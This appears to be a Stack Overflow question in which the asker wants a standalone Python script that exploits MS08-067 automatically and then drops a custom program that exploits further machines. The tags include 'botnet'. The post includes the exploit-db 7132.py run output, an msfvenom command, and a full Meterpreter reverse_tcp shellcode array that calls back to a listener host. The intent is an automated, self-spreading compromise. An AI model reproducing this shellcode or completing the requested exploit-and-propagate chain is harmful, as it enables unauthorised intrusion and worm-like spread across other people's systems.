# How to make a Standalone exploit with a custom payload?

Tags: python, exploit, payload, metasploit, botnet

**First of all, what I want to achieve:**

I want to exploit a device with a script (in python) without metasploit (therefore standalone) and run a custom programm on the exploitet device. This should happen automatically (I just want to run the script and it does everything for me).

**Problems:**

**(1)** I have not found a working standalone exploit yet (or at least it did not work for me). What I found by now in Kali Linux is /usr/share/exploitdb/exploits/windows/remote/7132.py and /usr/share/exploitdb/exploits/windows/remote/40279.py but as stated the exploit was not successfull ([unsuccessful-exploit](https://i.stack.imgur.com/ZMtYH.png))([nmap-target-port-445](https://i.stack.imgur.com/eOFXl.png)).

**(2)** When I finally get it working, how do I get my own programm on the device? I know how to do it manually with windows/meterpreter/reverse_tcp, but I haven't found a way to do that automatically. I am looking for something like windows/MY_PROGRAMM/reverse_tcp. Is this somehow possible via msfvenom or is there another way to achieve my goal? I know about "generic/custom" in msfconsole but I don't want to use metasploit (is a requirement for this project) and there is a size limit. Therefore I need a stage and a stager, am I right?

**Note:** The custom programm on the traget should then exploit another device. Just a note if this somehow affects the answer.

I hope my problem is somehow clear and sorry if I made a mistake in some way. This is my first question here.

**Edit: How I tried to solve problem(1):**

`searchsploit -m 7132.py` (copies the exploit into the current path)

`python 7132.py 192.168.1.56 1` (execute the script with option 1 --> Windows 2000)

I get this:

```
#######################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#######################################################################

[-]Windows 2000 payload loaded
[-]Initiating connection

[-]connected to ncacn_np:192.168.1.56[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
```

but can't telnet to the host:

```
Trying 192.168.1.56...
telnet: Unable to connect to remote host: Connection refused
```

**For problem(2):**

I don't really know how to solve it which is why I ask the question.I know you can create a payload like this:

```
root@osboxes:~/Documents# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.44 LPORT=4949 -f c -a x86 --platform windows
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of c file: 1457 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x2c"
"\x68\x02\x00\x13\x55\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
```

And then paste the shellcode into the exploit script, but as stated above I don't want a meterpreter session, I just want my programm to be uploaded to the target and executed.

Comment: I am not familiar with what you want, but a general rule here is you provide some code, or a minimum reproducible example. See [how to ask](https://stackoverflow.com/help/how-to-ask).

Comment: The code of the 7132.py script is already available in Kali Linux and quite long (didn't want to post everthing here). Here a link to same script on Git: https://github.com/51x/WHP/blob/master/ms08-067_exploit_7132.py. However, I added how I tried to solve the problems by now. Hope this is what you wanted.

Comment: It seems to be good.

Comment: @SomelITStudent It seems to be good.